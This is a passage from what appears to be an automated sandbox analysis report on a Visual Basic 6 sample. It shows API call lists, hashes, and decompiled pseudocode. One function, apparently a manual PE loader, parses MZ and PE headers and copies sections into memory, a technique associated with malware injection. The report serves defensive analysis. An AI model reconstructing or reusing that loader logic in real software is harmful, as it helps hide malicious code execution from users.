                                                        • Instruction Fuzzy Hash: D02141B0900205BBCB10AF55CD89EDEBBB8FF59755F100039F542B31A0D7745888CB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(?,00000000,?), ref: 0042413E
                                                        • #608.MSVBVM60(?), ref: 00424170
                                                        • __vbaVarCat.MSVBVM60(?,?,00000008), ref: 00424182
                                                        • __vbaStrVarMove.MSVBVM60(00000000), ref: 00424189
                                                        • __vbaStrMove.MSVBVM60 ref: 00424196
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004241A2
                                                        • __vbaErrorOverflow.MSVBVM60 ref: 004241E4
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Move$#608CopyErrorFreeListOverflow
                                                        • String ID:
                                                        • API String ID: 224696310-0
                                                        • Opcode ID: 12fde72446bb504533e342735379de782f866947bc6f24ff4ca0ce03cc353297
                                                        • Instruction ID: d9deb678c685300fd312cf3568453abdbd1b0516cb045a27177e64b5717359ac
                                                        • Opcode Fuzzy Hash: 12fde72446bb504533e342735379de782f866947bc6f24ff4ca0ce03cc353297
                                                        • Instruction Fuzzy Hash: 9311D575A00259AFDB14CF94EA48AEE77B8FB48701F504026F505A3250E7786E058B69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrI4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D1E
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D29
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D34
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D3D
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004015D0,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418D7E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckCopyFreeHresultMove
                                                        • String ID: FormatText
                                                        • API String ID: 2366466627-2196219705
                                                        • Opcode ID: df22f6435530819ac231e12326990d795a244dc4129ef9c5e86be5c3e9fab0ad
                                                        • Instruction ID: 93c431ecf1583040acda965a528e3ccf86d7fb3ce1253c2d416d41a78d2c1eb0
                                                        • Opcode Fuzzy Hash: df22f6435530819ac231e12326990d795a244dc4129ef9c5e86be5c3e9fab0ad
                                                        • Instruction Fuzzy Hash: 99112174900204AFC714DF69DA89A9ABFF8FF58700F10816AF506E73A4DB78A945CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256690931.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3e0000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction ID: 2013cccdc5560c63cc9c067863379142da5f647e163ff60c53d731994f99eafb
                                                        • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction Fuzzy Hash: 7D51B672A043A19BD72ADF27C840B5FB3E89BD4794F04072DF548E7281E2B5D945C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 30%
                                                        			E00426970(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                                                        				signed int _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				signed int _v28;
                                                        				void* _t27;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				intOrPtr* _t37;
                                                        				intOrPtr* _t47;
                                                        				intOrPtr* _t48;
                                                        				signed int _t50;
                                                        				signed int _t51;
                                                        				void* _t52;
                                                        				void* _t54;
                                                        				intOrPtr _t55;
                                                        
                                                        				_t55 = _t54 - 0xc;
                                                        				 *[fs:0x0] = _t55;
                                                        				_v16 = _t55 - 0x14;
                                                        				_v12 = 0x401cc8;
                                                        				_t50 = _a4;
                                                        				_v8 = _t50 & 0x00000001;
                                                        				_t51 = _t50 & 0xfffffffe;
                                                        				_a4 = _t51;
                                                        				 *((intOrPtr*)( *_t51 + 4))(_t51, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t52);
                                                        				_v28 = 0;
                                                        				if( *((short*)(_t51 + 0x34)) != 1) {
                                                        					if( *0x42a056 == 0xffff) {
                                                        						_t29 =  *((intOrPtr*)( *_t51 + 0x2fc))(_t51);
                                                        						_t37 = __imp____vbaObjSet;
                                                        						_t47 =  *_t37( &_v28, _t29);
                                                        						_t31 =  *((intOrPtr*)( *_t47 + 0x5c))(_t47, 0);
                                                        						asm("fclex");
                                                        						if(_t31 < 0) {
                                                        							__imp____vbaHresultCheckObj(_t31, _t47, 0x412014, 0x5c);
                                                        						}
                                                        						__imp____vbaFreeObj();
                                                        						_t48 =  *_t37( &_v28,  *((intOrPtr*)( *_t51 + 0x2fc))(_t51));
                                                        						_t35 =  *((intOrPtr*)( *_t48 + 0x5c))(_t48, 0xffffffff);
                                                        						asm("fclex");
                                                        						if(_t35 < 0) {
                                                        							__imp____vbaHresultCheckObj(_t35, _t48, 0x412014, 0x5c);
                                                        						}
                                                        						__imp____vbaFreeObj();
                                                        					}
                                                        					 *((short*)(_t51 + 0x34)) = 1;
                                                        					_t27 =  *((intOrPtr*)( *_t51 + 0x714))(_t51);
                                                        				} else {
                                                        					 *((short*)(_t51 + 0x34)) = 2;
                                                        					_t27 =  *((intOrPtr*)( *_t51 + 0x714))(_t51);
                                                        				}
                                                        				_v8 = 0;
                                                        				_push(0x426a7a);
                                                        				return _t27;
                                                        			}



















                                                        0x00426973
                                                        0x00426982
                                                        0x0042698f
                                                        0x00426992
                                                        0x00426999
                                                        0x004269a1
                                                        0x004269a4
                                                        0x004269a8
                                                        0x004269ad
                                                        0x004269b5
                                                        0x004269bc
                                                        0x004269da
                                                        0x004269df
                                                        0x004269e5
                                                        0x004269f2
                                                        0x004269f9
                                                        0x004269fe
                                                        0x00426a00
                                                        0x00426a0b
                                                        0x00426a0b
                                                        0x00426a14
                                                        0x00426a2a
                                                        0x00426a31
                                                        0x00426a36
                                                        0x00426a38
                                                        0x00426a43
                                                        0x00426a43
                                                        0x00426a4c
                                                        0x00426a4c
                                                        0x00426a55
                                                        0x00426a5b
                                                        0x004269be
                                                        0x004269c1
                                                        0x004269c7
                                                        0x004269c7
                                                        0x00426a61
                                                        0x00426a68
                                                        0x00000000

                                                        APIs
                                                        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 004269F0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412014,0000005C), ref: 00426A0B
                                                        • __vbaFreeObj.MSVBVM60 ref: 00426A14
                                                        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 00426A28
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412014,0000005C), ref: 00426A43
                                                        • __vbaFreeObj.MSVBVM60 ref: 00426A4C
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult
                                                        • String ID:
                                                        • API String ID: 444973724-0
                                                        • Opcode ID: 07c4af59592e19c593237c716ab18da44d703ac76c12bee90187a58281a0d908
                                                        • Instruction ID: c9fcb309fc25fa29369b2048aa47880278ec3734a389c4e3143a9d0f139fde5f
                                                        • Opcode Fuzzy Hash: 07c4af59592e19c593237c716ab18da44d703ac76c12bee90187a58281a0d908
                                                        • Instruction Fuzzy Hash: 9C316170600215ABD7109F64DD49EABBBB8FF05704F604169F545E32E1D778A8858FA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 46%
                                                        			E00423CC0(void* __ebx, void* __esi, void* __ebp, intOrPtr _a4) {
                                                        				intOrPtr _v4;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v176;
                                                        				intOrPtr _v192;
                                                        				void _v248;
                                                        				short _v268;
                                                        				intOrPtr _v282;
                                                        				intOrPtr _v284;
                                                        				void _v288;
                                                        				intOrPtr _v296;
                                                        				char _v300;
                                                        				intOrPtr _v304;
                                                        				intOrPtr _v308;
                                                        				intOrPtr _v312;
                                                        				intOrPtr _v316;
                                                        				short _v544;
                                                        				short _v556;
                                                        				void _v564;
                                                        				signed char _v568;
                                                        				char _v628;
                                                        				intOrPtr _v636;
                                                        				signed int _v640;
                                                        				signed int _v644;
                                                        				intOrPtr _v780;
                                                        				void _v888;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        				intOrPtr _t57;
                                                        				int _t59;
                                                        				void* _t62;
                                                        				signed char _t65;
                                                        				void* _t66;
                                                        				void* _t69;
                                                        				void* _t73;
                                                        				void* _t74;
                                                        				void* _t76;
                                                        				void* _t79;
                                                        				void* _t80;
                                                        				void* _t83;
                                                        				void* _t85;
                                                        				void* _t86;
                                                        				void* _t88;
                                                        				intOrPtr _t90;
                                                        				void* _t93;
                                                        				void* _t98;
                                                        				intOrPtr _t120;
                                                        				void* _t122;
                                                        				intOrPtr _t123;
                                                        				intOrPtr _t124;
                                                        				short _t126;
                                                        				intOrPtr _t133;
                                                        				void* _t134;
                                                        				intOrPtr _t139;
                                                        				void* _t142;
                                                        				void* _t143;
                                                        				signed int _t148;
                                                        				signed int _t149;
                                                        				void* _t156;
                                                        				intOrPtr _t157;
                                                        				void* _t159;
                                                        				void* _t161;
                                                        				void* _t162;
                                                        				void* _t163;
                                                        				void* _t164;
                                                        				void* _t166;
                                                        				void* _t170;
                                                        				void* _t172;
                                                        				void* _t175;
                                                        				void* _t178;
                                                        				void* _t181;
                                                        
                                                        				_t93 = __ebx;
                                                        				memset( &_v288, memset( &_v248, 0, 0x3e << 2), 0xa << 2);
                                                        				_t175 = _t172 - 0x120 + 0x18;
                                                        				_t139 = _a4;
                                                        				_t54 =  &_v248;
                                                        				L18();
                                                        				__imp____vbaI4Str(L"&H1000", 4, _t139, _t54, _t134, __esi, __ebp, __ebx);
                                                        				_push(_t54);
                                                        				_push(_v176);
                                                        				_push(_v4);
                                                        				_t55 = E00423FD0();
                                                        				_push(_v192);
                                                        				_push(_t139);
                                                        				_push(_t55);
                                                        				E00424000();
                                                        				_t156 = _t54 + 4;
                                                        				_t126 = _v268;
                                                        				_t57 = _v282;
                                                        				if(_t156 < 0) {
                                                        					L17:
                                                        					__imp____vbaErrorOverflow();
                                                        					0;
                                                        					0;
                                                        					_push(_t93);
                                                        					_push(_t156);
                                                        					_push(_t139);
                                                        					_t59 = memset( &_v564, 0, 0x3e << 2);
                                                        					_t142 =  &_v628;
                                                        					memset(_t142, _t59, 0x10 << 2);
                                                        					_t178 = _t175 - 0x138 + 0x18;
                                                        					_t143 = _t142 + 0x10;
                                                        					_t62 = E004240A0( &_v628);
                                                        					_push(0x40);
                                                        					_t157 = _v316;
                                                        					_push(_t157);
                                                        					_push(_t62);
                                                        					E00424000();
                                                        					if((_v644 & 0x0000ffff) != 0x5a4d) {
                                                        						L25:
                                                        						return 0;
                                                        					} else {
                                                        						_t65 = _v568;
                                                        						if((_t65 & 0x00000003) != 0) {
                                                        							goto L25;
                                                        						} else {
                                                        							_t66 = _t65 + _t157;
                                                        							if(_t66 < 0) {
                                                        								__imp____vbaErrorOverflow();
                                                        								0;
                                                        								_push(0);
                                                        								_push(_t157);
                                                        								_push(_t143);
                                                        								memset( &_v888, 0, 0x3e << 2);
                                                        								_t181 = _t178 - 0xf8 + 0xc;
                                                        								_t69 =  &_v888;
                                                        								_push(_t69);
                                                        								_push(_v636);
                                                        								L18();
                                                        								_t159 = _t69;
                                                        								if(_t159 == 0) {
                                                        									L38:
                                                        									return 0;
                                                        								} else {
                                                        									_t148 = _v640;
                                                        									if(_t148 < 0 || _t148 >= _v780) {
                                                        										goto L38;
                                                        									} else {
                                                        										_t98 = E004240A0(_v636);
                                                        										if(_t148 >= 0x10) {
                                                        											__imp____vbaGenerateBoundsError();
                                                        										}
                                                        										_t73 = E004240A0(_t181 + 0x84 + _t148 * 8);
                                                        										_push(8);
                                                        										_push(_t73);
                                                        										_push(_t98);
                                                        										_t74 = E00424000();
                                                        										_t161 = _t159 + 4;
                                                        										if(_t161 < 0) {
                                                        											L39:
                                                        											__imp____vbaErrorOverflow();
                                                        											return _t74;
                                                        										}
                                                        										_t162 = _t161 + 0x14;
                                                        										if(_t162 < 0) {
                                                        											goto L39;
                                                        										}
                                                        										_t163 = _t162 + 0x60;
                                                        										if(_t163 < 0) {
                                                        											goto L39;
                                                        										}
                                                        										_t149 = _t148 * 8;
                                                        										if(_t149 < 0) {
                                                        											goto L39;
                                                        										}
                                                        										_t164 = _t163 + _t149;
                                                        										if(_t164 < 0) {
                                                        											goto L39;
                                                        										}
                                                        										return _t164;
                                                        									}
                                                        								}
                                                        							} else {
                                                        								_t166 = _t66;
                                                        								_t76 = E004240A0( &_v564);
                                                        								_push(0xf8);
                                                        								_push(_t166);
                                                        								_push(_t76);
                                                        								E00424000();
                                                        								if(_v556 != 0x10b || _v564 != 0x4550 || _v544 != 0xe0) {
                                                        									goto L25;
                                                        								} else {
                                                        									_t79 = E004240A0(_v308);
                                                        									_t80 = E004240A0( &_v568);
                                                        									_push(0xf8);
                                                        									_push(_t80);
                                                        									_push(_t79);
                                                        									E00424000();
                                                        									return _t166;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        				} else {
                                                        					_t156 = _t156 + 0x14;
                                                        					if(_t156 < 0) {
                                                        						goto L17;
                                                        					} else {
                                                        						_t156 = _t156 + _t126;
                                                        						if(_t156 < 0) {
                                                        							goto L17;
                                                        						} else {
                                                        							_t83 = _t57 - 1;
                                                        							if(_t83 < 0) {
                                                        								goto L17;
                                                        							} else {
                                                        								_t170 = _t83;
                                                        								_t93 = 0;
                                                        								if(_t170 < 0) {
                                                        									L16:
                                                        									return 0;
                                                        								} else {
                                                        									while(1) {
                                                        										_t85 = E004240A0( &_v300);
                                                        										_t86 = E00424000();
                                                        										__imp____vbaI4Str(L"&H1000", 4, _t85, _t156, 0x28);
                                                        										_push(_t86);
                                                        										_t139 = _v24;
                                                        										_t88 = _v308 + _t139;
                                                        										_push(_v312);
                                                        										if(_t88 < 0) {
                                                        											goto L17;
                                                        										}
                                                        										_push(_t88);
                                                        										_t139 = E00423FD0();
                                                        										_t90 = _v304;
                                                        										if(_t90 == 0) {
                                                        											L13:
                                                        											__imp____vbaUI1I2();
                                                        											_push(_t90);
                                                        											_push(_v296);
                                                        											_push(_t139);
                                                        											E00424010();
                                                        											_t156 = _t156 + 0x28;
                                                        											if(_t156 < 0) {
                                                        												goto L17;
                                                        											} else {
                                                        												_t93 = _t93 + 1;
                                                        												if(_t93 < 0) {
                                                        													goto L17;
                                                        												} else {
                                                        													if(_t93 <= _t170) {
                                                        														continue;
                                                        													} else {
                                                        														goto L16;
                                                        													}
                                                        												}
                                                        											}
                                                        										} else {
                                                        											_t120 = _v296;
                                                        											if(_t90 > _t120) {
                                                        												_t90 = _t120;
                                                        												_v288 = _t90;
                                                        											}
                                                        											_t122 = _v284 + _v12;
                                                        											_push(_t90);
                                                        											if(_t122 < 0) {
                                                        												goto L17;
                                                        											} else {
                                                        												_push(_t122);
                                                        												_push(_t139);
                                                        												E00424000();
                                                        												_t90 = _v300;
                                                        												_t123 = _v308;
                                                        												_t133 = _t90 + _t139;
                                                        												if(_t133 < 0) {
                                                        													goto L17;
                                                        												} else {
                                                        													_t124 = _t123 - _t90;
                                                        													_t139 = _t133;
                                                        													if(_t124 < 0) {
                                                        														goto L17;
                                                        													} else {
                                                        														_v296 = _t124;
                                                        														goto L13;
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        										goto L41;
                                                        									}
                                                        									goto L17;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				goto L41;
                                                        			}










































































                                                        0x00423cc0
                                                        0x00423ce0
                                                        0x00423ce0
                                                        0x00423ce2
                                                        0x00423ce9
                                                        0x00423cef
                                                        0x00423cfd
                                                        0x00423d03
                                                        0x00423d12
                                                        0x00423d13
                                                        0x00423d14
                                                        0x00423d20
                                                        0x00423d21
                                                        0x00423d22
                                                        0x00423d23
                                                        0x00423d28
                                                        0x00423d2b
                                                        0x00423d30
                                                        0x00423d35
                                                        0x00423e1e
                                                        0x00423e1e
                                                        0x00423e2a
                                                        0x00423e2e
                                                        0x00423e3d
                                                        0x00423e3e
                                                        0x00423e3f
                                                        0x00423e44
                                                        0x00423e4b
                                                        0x00423e4f
                                                        0x00423e4f
                                                        0x00423e4f
                                                        0x00423e58
                                                        0x00423e5d
                                                        0x00423e5f
                                                        0x00423e66
                                                        0x00423e67
                                                        0x00423e68
                                                        0x00423e7d
                                                        0x00423ef2
                                                        0x00423efd
                                                        0x00423e7f
                                                        0x00423e7f
                                                        0x00423e85
                                                        0x00000000
                                                        0x00423e87
                                                        0x00423e87
                                                        0x00423e8d
                                                        0x00423f00
                                                        0x00423f0c
                                                        0x00423f1d
                                                        0x00423f1e
                                                        0x00423f1f
                                                        0x00423f24
                                                        0x00423f24
                                                        0x00423f2d
                                                        0x00423f31
                                                        0x00423f32
                                                        0x00423f35
                                                        0x00423f3a
                                                        0x00423f3e
                                                        0x00423faa
                                                        0x00423fb5
                                                        0x00423f40
                                                        0x00423f40
                                                        0x00423f49
                                                        0x00000000
                                                        0x00423f54
                                                        0x00423f64
                                                        0x00423f66
                                                        0x00423f68
                                                        0x00423f68
                                                        0x00423f76
                                                        0x00423f7b
                                                        0x00423f7d
                                                        0x00423f7e
                                                        0x00423f7f
                                                        0x00423f84
                                                        0x00423f87
                                                        0x00423fb8
                                                        0x00423fb8
                                                        0x00000000
                                                        0x00423fb8
                                                        0x00423f89
                                                        0x00423f8c
                                                        0x00000000
                                                        0x00000000
                                                        0x00423f8e
                                                        0x00423f91
                                                        0x00000000
                                                        0x00000000
                                                        0x00423f93
                                                        0x00423f96
                                                        0x00000000
                                                        0x00000000
                                                        0x00423f98
                                                        0x00423f9b
                                                        0x00000000
                                                        0x00000000
                                                        0x00423fa7
                                                        0x00423fa7
                                                        0x00423f49
                                                        0x00423e8f
                                                        0x00423e90
                                                        0x00423e92
                                                        0x00423e97
                                                        0x00423e9c
                                                        0x00423e9d
                                                        0x00423e9e
                                                        0x00423eaa
                                                        0x00000000
                                                        0x00423ebf
                                                        0x00423ec7
                                                        0x00423ed3
                                                        0x00423ed8
                                                        0x00423edd
                                                        0x00423ede
                                                        0x00423edf
                                                        0x00423eef
                                                        0x00423eef
                                                        0x00423eaa
                                                        0x00423e8d
                                                        0x00423e85
                                                        0x00423d3b
                                                        0x00423d3b
                                                        0x00423d3e
                                                        0x00000000
                                                        0x00423d44
                                                        0x00423d44
                                                        0x00423d46
                                                        0x00000000
                                                        0x00423d4c
                                                        0x00423d4c
                                                        0x00423d50
                                                        0x00000000
                                                        0x00423d56
                                                        0x00423d56
                                                        0x00423d59
                                                        0x00423d5d
                                                        0x00423e0f
                                                        0x00423e1b
                                                        0x00423d63
                                                        0x00423d63
                                                        0x00423d68
                                                        0x00423d71
                                                        0x00423d7d
                                                        0x00423d83
                                                        0x00423d88
                                                        0x00423d93
                                                        0x00423d95
                                                        0x00423d96
                                                        0x00000000
                                                        0x00000000
                                                        0x00423d9c
                                                        0x00423da2
                                                        0x00423da4
                                                        0x00423daa
                                                        0x00423de9
                                                        0x00423deb
                                                        0x00423df5
                                                        0x00423df6
                                                        0x00423df7
                                                        0x00423df8
                                                        0x00423dfd
                                                        0x00423e00
                                                        0x00000000
                                                        0x00423e02
                                                        0x00423e02
                                                        0x00423e05
                                                        0x00000000
                                                        0x00423e07
                                                        0x00423e09
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00423e09
                                                        0x00423e05
                                                        0x00423dac
                                                        0x00423dac
                                                        0x00423db2
                                                        0x00423db4
                                                        0x00423db6
                                                        0x00423db6
                                                        0x00423dc5
                                                        0x00423dc7
                                                        0x00423dc8
                                                        0x00000000
                                                        0x00423dca
                                                        0x00423dca
                                                        0x00423dcb
                                                        0x00423dcc
                                                        0x00423dd1
                                                        0x00423dd5
                                                        0x00423ddb
                                                        0x00423ddd
                                                        0x00000000
                                                        0x00423ddf
                                                        0x00423ddf
                                                        0x00423de1
                                                        0x00423de3
                                                        0x00000000
                                                        0x00423de5
                                                        0x00423de5
                                                        0x00000000
                                                        0x00423de5
                                                        0x00423de3
                                                        0x00423ddd
                                                        0x00423dc8
                                                        0x00000000
                                                        0x00423daa
                                                        0x00000000
                                                        0x00423d63
                                                        0x00423d5d
                                                        0x00423d50
                                                        0x00423d46
                                                        0x00423d3e
                                                        0x00000000

                                                        APIs
                                                        • __vbaI4Str.MSVBVM60(&H1000,00000004,?,?,72A46AEE,00000000,?,?), ref: 00423CFD
                                                        • __vbaI4Str.MSVBVM60(&H1000,00000004,00000000,-00000018,00000028,?,00000000,?,?,?,?,00000000,?,?), ref: 00423D7D
                                                        • __vbaUI1I2.MSVBVM60(?,?,00000000,?,?), ref: 00423DEB
                                                        • __vbaErrorOverflow.MSVBVM60(00000000,?,?,?,?,00000000,?,?), ref: 00423E1E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$ErrorOverflow
                                                        • String ID: &H1000
                                                        • API String ID: 275696625-2648123403
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: 64bb9756d3c69426e1d85879386c8959f5bfb4570975878a94bb64cfe91e0cb3
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: F8310271B043105BC324EF21E844EAB73FAEBC8746F41082EB68893240D67CED84C76A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 31%
                                                        			E004170C0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v40;
                                                        				intOrPtr* _t22;
                                                        				void* _t24;
                                                        				void* _t27;
                                                        				void* _t28;
                                                        				intOrPtr* _t40;
                                                        				intOrPtr* _t41;
                                                        				intOrPtr* _t43;
                                                        				void* _t44;
                                                        				void* _t46;
                                                        				intOrPtr _t47;
                                                        				intOrPtr _t48;
                                                        
                                                        				_t47 = _t46 - 0xc;
                                                        				 *[fs:0x0] = _t47;
                                                        				_t48 = _t47 - 0x24;
                                                        				_v16 = _t48;
                                                        				_v12 = 0x401418;
                                                        				_v8 = 0;
                                                        				_t43 = _a4;
                                                        				 *((intOrPtr*)( *_t43 + 4))(_t43, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t44);
                                                        				_v28 = 0;
                                                        				_t22 =  *((intOrPtr*)( *_t43 + 0x3ac))(_t43);
                                                        				__imp____vbaObjSet( &_v28, _t22);
                                                        				_t40 = _t22;
                                                        				_t24 =  *((intOrPtr*)( *_t40 + 0x54))(_t40, _a8);
                                                        				asm("fclex");
                                                        				if(_t24 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t24, _t40, 0x410414, 0x54);
                                                        				}
                                                        				__imp____vbaFreeObj();
                                                        				_t41 = _t48 - 0x10;
                                                        				 *_t41 = 8;
                                                        				 *((intOrPtr*)(_t41 + 4)) = _v40;
                                                        				 *(_t41 + 8) = L"ButtonBackColor";
                                                        				 *((intOrPtr*)(_t41 + 0xc)) = _v32;
                                                        				_t27 =  *((intOrPtr*)( *_t43 + 0x390))(_t43);
                                                        				asm("fclex");
                                                        				if(_t27 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t27, _t43, 0x40f430, 0x390);
                                                        				}
                                                        				_t28 =  *((intOrPtr*)( *_t43 + 0x8b4))(_t43);
                                                        				_push(0x417194);
                                                        				return _t28;
                                                        			}




















                                                        0x004170c3
                                                        0x004170d2
                                                        0x004170d9
                                                        0x004170df
                                                        0x004170e2
                                                        0x004170eb
                                                        0x004170ee
                                                        0x004170f4
                                                        0x004170fa
                                                        0x004170fd
                                                        0x00417108
                                                        0x00417111
                                                        0x00417117
                                                        0x0041711c
                                                        0x0041711e
                                                        0x00417129
                                                        0x00417129
                                                        0x00417132
                                                        0x00417140
                                                        0x0041714a
                                                        0x0041714f
                                                        0x00417152
                                                        0x00417158
                                                        0x0041715b
                                                        0x00417163
                                                        0x00417165
                                                        0x00417173
                                                        0x00417173
                                                        0x0041717c
                                                        0x00417182
                                                        0x00000000

                                                        APIs
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417108
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000054,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417129
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417132
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401418,0040F430,00000390), ref: 00417173
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresult$Free
                                                        • String ID: ButtonBackColor
                                                        • API String ID: 3976024557-3751566386
                                                        • Opcode ID: 3b987c34004e9753320590fa2bc5a0748421a7b2fddbcf62a5bab024931de8a0
                                                        • Instruction ID: 71db052ecdae409ba0909371a949f5de8a33efcce4d4d7b31651c4b982fe7c9d
                                                        • Opcode Fuzzy Hash: 3b987c34004e9753320590fa2bc5a0748421a7b2fddbcf62a5bab024931de8a0
                                                        • Instruction Fuzzy Hash: 96216D74900205BFC7009F68C989A9ABBF9FF49700F20853AF945E7291C778A9858B94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 31%
